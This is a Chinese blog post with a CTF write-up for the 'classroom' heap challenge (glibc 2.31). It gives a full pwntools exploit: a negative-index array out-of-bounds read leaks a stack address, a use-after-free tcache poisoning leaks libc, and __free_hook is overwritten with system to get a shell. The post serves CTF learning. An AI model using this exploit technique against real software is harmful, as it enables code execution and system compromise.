堆技巧 数组反向越界泄露地址

最新推荐文章于 2022-11-03 19:37:33 发布
最新推荐文章于 2022-11-03 19:37:33 发布
阅读量299 收藏
点赞数
分类专栏: pwn 堆利用 CTF 文章标签: c++ linux python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbsqigongzi/article/details/126657002
版权
pwn 同时被 3 个专栏收录
67 篇文章 5 订阅
订阅专栏
CTF
61 篇文章 1 订阅
订阅专栏
堆利用
18 篇文章 1 订阅
订阅专栏

四川省2021信息安全技术大赛 classroom

痛苦痛苦痛苦,调了半天才找到数组起始地址,还是自己太菜了,好好记录一下这题
在这里插入图片描述
在这里插入图片描述
题目给了libc,2.31的题
嗯,可以考虑覆盖got表或者hook函数
打开ida发现是c++的题,认真分析一下

free函数

在这里插入图片描述

存在UAF

add函数与show函数

在这里插入图片描述
index是int型数据,有符号整型,可以为负数,程序会在申请完chunk后将chunk内容输出出来,如果我们输入index处本来有内容,那么他会不让我们输入内容,直接将chunk的内容输出来,这里我们就想到利用数组越界来泄露某些地址了。
add函数只允许申请0x20大小的chunk,且输入的chunk内容最多为8字节

add函数
show函数,chunk内容位于第二个参数,rsi传参

思路

1.利用gdb调试找到chunk数组起始地址,输入负数泄露栈地址
2.利用UAF获得libc地址
3.利用UAF覆盖__free_hook为system函数
4.释放内容为/bin/sh的chunk获得shell

过程

先把前面的写好

# coding=utf-8
from pwn import *
context.log_level='debug'
s       = lambda data               :p.send(data)
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims		    :p.recvuntil(delims)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))
#p=remote('',)
p=process('./classroom')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def dbg(cmd=''):
	gdb.attach(p,cmd)
	 

def add(idx, content = 'a\n'):

	sla('>', str(1))

	sla('Would you tell me THIS STUDENT\'S ID?\n>', str(idx))

	sla('Would you tell me THIS STUDENT\'S NAME?\n>', content)

def free(idx):

	sla('>', str(2))

	sla('Would you tell me THIS STUDENT\'S ID?\n>', str(idx))

def edit(idx, content):

	sla('>', str(3))

	sla('Would you tell me THIS STUDENT\'S ID?\n>', str(idx))

	sla('Would you tell me THIS STUDENT\'S NAME?\n>', content)

在这里插入图片描述
show函数在0x1957处,在下断点调试

# coding=utf-8
from pwn import *
context.log_level='debug'
def dbg(cmd=''):
	gdb.attach(p,cmd)
p=process('./classroom')
dbg('b * $rebase(0x1957)')
p.interactive()

我们申请三个chunk,内容依次为eee,qwe,zxczx,依次为chunk0,1,2,每当执行到show函数的时候,我们发现chunk0,1,2依次存在返回地址的下面,说明数组起始地址(也就是a1的地址就是返回地址的下一位(0x7ffe916dca58)),那么我们可以输入 -4来获取0x7ffe916dcac0这个地址

sla('>', str(1))
sla('Would you tell me THIS STUDENT\'S ID?\n>', str(0xfffffffc)) #-4  4294967292 
 
ru('Welcome my student :')

 
stack = u64(r(6).ljust(8, '\x00')) 
lg('stack',stack)
 
libc_ret = stack+0x8
lg('libc_ret',libc_ret)
#libc_ret
 

dbg('b * $rebase(0x1957)')

在这里插入图片描述

泄露的栈地址0x7ffe916dcac0+0x8就是存放__libc_start_main+243的地址,我们可以利用uaf修改chunk的fd指针使chunk申请到__libc_start_main+243处,获得libc,由于我们不能破坏栈结构,我们可以找个没有有用数据的地址stack-0x70处,然后将存放__libc_start_main+243的地址放到stack-0x70处,之后show函数输出__libc_start_main+243地址,获得libc基地址。

add(0)
add(1)
add(2)
add(5)
add(6)
add(7, '/bin/sh') #存放/bin/sh,一会将free_hook改为system时使用
free(0)             
free(1)
dbg()

在这里插入图片描述

edit(1, p64(stack-0x70))    #修改tcache bin chunk1指向stack-0x70处
dbg()

在这里插入图片描述

add(3)
dbg()

在这里插入图片描述
再次申请chunk,会把chunk申请到stack-0x70处,将存放__libc_start_main+243的地址写入

add(4, p64(libc_ret)) #将chunk申请到stack-0x70处

sla('>', str(1))
sla('Would you tell me THIS STUDENT\'S ID?\n>', str(0)) 
p.recvuntil('Welcome my student :')
libc.address = u64(r(6).ljust(8, '\0'))-libc.sym['__libc_start_main']-243
lg('libc.address ',libc.address )
dbg()

在这里插入图片描述
之后利用相同的方法将free_hook改为system函数

free(5)

free(6)

edit(6, p64(libc.sym['__free_hook']))

add(8)

add(9, p64(libc.sym['system']))

free(7)


itr()

获得shell

在这里插入图片描述

tbsqigongzi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简述反向地址转换协议
07-19
本文主要叙述了简述反向地址转换协议及其工作过程,以及解决RARP回应问题的两种方法 。
js-array-reverse:浏览器和node.js的数组反向
05-14
`Array.prototype.reverse()`方法是JavaScript中用于数组反向的一个核心功能,它可以在原数组上直接操作,改变数组元素的顺序,将原本在前的元素移到后面,原本在后的元素移到前面。这个方法对于处理和分析数据时,...
Buuctf(pwn) ez_pz_hackover_2016 泄露地址,retshellcode;调试计算
半岛铁盒的博客
08-13 898
32位,开启了RELRO保护,地址随机化 没有开启nx保护,可利用入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 dest大小根本不是0x32,要动态调试看大小其实是 0x16 利用思路: 1.往s参数里入shellcode,执行vuln函数后让dest造成溢出
pwn 溢出之 泄露基址
qq_41071646的博客
04-25 2894
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章的很清楚 而且 代码直接就可以拿到f...
environ泄露地址+orw+uaf
FUCKING12的博客
10-08 623
这个题开了沙箱,有uaf。利用思路:借助environ泄露地址,利用uaf将orw到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
Magic_Book(stdout泄露地址
FUCKING12的博客
11-03 202
箭头所指的chunk在tcachebins和unsortedbin里面,同时unsortdbin里面还有main_arena+96的地址地址,我们可以利用这2个残余地址来爆破stdout。首先是分别改了这2处的2字节,这么改的目的是:可以将chunk分配到stdout附近,然后就可以修改stdout里面的数据,来泄露地址。tcachebins是不检查你的size的,所以可以随便利用其分配到你想要的地址去。因为我们没有show函数无法泄露地址,所以我们需要打stdout来泄露地址
Double Free浅析(泄露地址的一种方法)
omnispace的博客
04-18 7238
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向内存的指针都有可能产生可以利用的漏洞。double free的原理其实和溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像和普通的溢出伪造chunk然后free触发unlink...
python实现根据ip地址反向查找主机名称的方法
09-22
主要介绍了python实现根据ip地址反向查找主机名称的方法,涉及Python使用socket解析IP的相关技巧,非常具有实用价值,需要的朋友可以参考下
Java中的反向数组列表
02-15
在Java编程语言中,"反向数组列表"通常指的是对数组列表(ArrayList)中的元素进行反转操作。数组列表是Java集合框架的一部分,它允许我们存储和操作一组有序的对象。在这个主题中,我们将深入探讨如何在Java中实现...
google map 3.0 反向解析地址
05-04
在Google Map 3.0版本中,反向解析地址(Geocoding)是一项重要的功能,它允许用户通过输入一个具体的地址来获取对应的经纬度坐标。这种技术在众多应用中都有所应用,比如导航系统、位置服务、数据分析等。 反向...
libc2.26以下的单一溢出漏洞利用——0ctf_2017_babyheap
PLpa的博客
08-03 585
前言: 此题为libc2.26以下的libc环境,在libc2.27及以上不一定行得通。 解题思路: 查看保护: 保护全开的64位程序。 观察IDA伪代码: 我们进入IDA看看程序(在此之前建议先运行一遍程序,看看程序的逻辑)。 标准的菜单题,题目先申请了一块结构来保存接下来我们要申请的地址,在开了保护的情况下,我们并不能很容易的找到这块地址在哪,这样我们就很难把块劫持到这个上面。 我们看看各个功能: 增 本题采用了calloc来申请块,这样对于申请的块来说,原有的数据就会被清除掉,这样我
栈泄漏实践报告
qq_24599583的博客
10-09 646
0x00 栈溢出是啥呀! 栈溢出是指在栈内入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。 例如:read(0, buf, 80); 要想栈溢出,我们????️满足两个条件。 第一,程序要有向栈入数据的行为; 第二,程序并不限制入数据的长度。 我们知道,UNIX本身以及其上的许多应用程序都是用C语言编的,C语言不检查缓冲区的边界。在某些情况下,如果用户输入的数据长度超过应用程序给定的缓冲区,就会覆盖其他数据区。这称作“栈溢出或缓冲溢出”。 如果想用栈溢出来执行攻击指令,就要在溢
泄露地址和利用总结
inquisiter
07-17 859
已知libc.so 栈执行保护---------->调用libc.so system("/bin/sh") 关闭ASLR system在内存中的地址不会变化 如果elf中调用了print和read,那么我们就可以搜索内存直接调用。 如果开启ASLR, 我们可以根据got得到print@plt和system在libc.so中的偏移得到system 的地址。 read@plt ...
C语言笔记,数组下标越界,栈结构
proorck2019的博客
12-31 624
//b[5]越界了,0..4 #include <stdio.h> int main(){ int a=6543,b[5]; printf("%d",b[5]); return 0; } 这个数组下标越界很明显,声明时明明是b[5],使用时却不能用b[5],没错,C语言就是这样设计的。 这段程序将显示一个随机值吗?错,它显示变量a的值,即6543,不是随机值。这是为什么?要从栈的结构说起。 栈是从高地址向低地址生长的,main函数开始时,先分配一个a,再分配5个in
关于数组越界(内存泄漏)的那点事儿(C语言)
田螺姑娘的博客
08-05 1132
关于数组越界(内存泄漏)的那点事儿(C语言)   数组越界在C语言是一个很常见的问题,但是也正是因为它很常见,有时候也会出现一些不可思议,难以理解的情况,就像下面这样。 情形如下: 如果难以理解,我们来打印一下数组a每个节点的地址以及num的地址。 如下:   我们可以看到,当数组a循环到a[12]的时候与num的地址完全相同。从而覆盖了num已有的值12,变成a[ ] = 0的值,即0。重新累加。   我们思考可以发现,此时num跟a[9]相差8个字节的偏移量。那么我们会想,不管num是任意数据类型,
linux内核泄露地址的方式
inquisiter
09-16 468
早些的时候可以利用dmesg通过缺页错误来泄露内核地址,但新一点的内核把这个修复了。最近看了下,遇到了目前常用的方式,详细分析下。 shmat 大部分搜到的记录是利用 struct shm_file_data { int id; struct ipc_namespace *ns; struct file *file; const struct vm_operations_struct *vm_ops; }; #define shm_file_data(file) (*((st
数组越界,栈与问题
weixin_42224577的博客
08-29 784
一.数组越界的经典案列 我们先来看一段代码: #include<stdio.h> int main() { int i; int arr[10]; for(i=0;i<=10;i++) { arr[i]=0; printf("%d\n",arr[i]); } return 0; } 在Linux中的运行结果如下图: 这里打印了11个0而且还显示了栈粉碎错误; 因为栈是从高地址往低地址扩展,也就是先入的数据在高地址,i定义在arr之前,先被压入栈中在高地址,而数组在栈中是从低地址往高地
泄露libc
inquisiter
01-12 1536
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可,但是程序使用的是printf_chk函数。会检测出形如&amp;quot;%n&amp;quot;和&amp;quot;%12$p&amp;quot;这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露出libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
C语言数组越界问题
m0_55990042的博客
05-22 2279
越界问题: 数组越界获取到的值. 因为越界后,获取到的值是按照存储的先后,先存入的则地址高,后存入的则地址低. 数组越界后,如果你越界了那么会获取到地址高的值. 所以在C语言当中对数组越界方面,要十分注意. 如果越界问题,从上面所说,获取到的是高地址. 那么需要注意的一点,C语言对于for、while、switch等一些语句进栈会有不一样的情况. 如果要真正的理解,需要看汇编以及一些存储问题. 那么用一个大概的想法. 以下是数组越界获取到的值的想法. 第一:获取到的就是一些垃圾
python numpy数组反向
最新发布
05-18
反向NumPy数组,可以使用numpy.flip()函数。此函数接受三个参数:输入数组、轴和输出数组。默认情况下,它返回一个新的反向数组。 以下是一个示例代码,展示如何使用numpy.flip()函数反向NumPy数组: ``` python...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值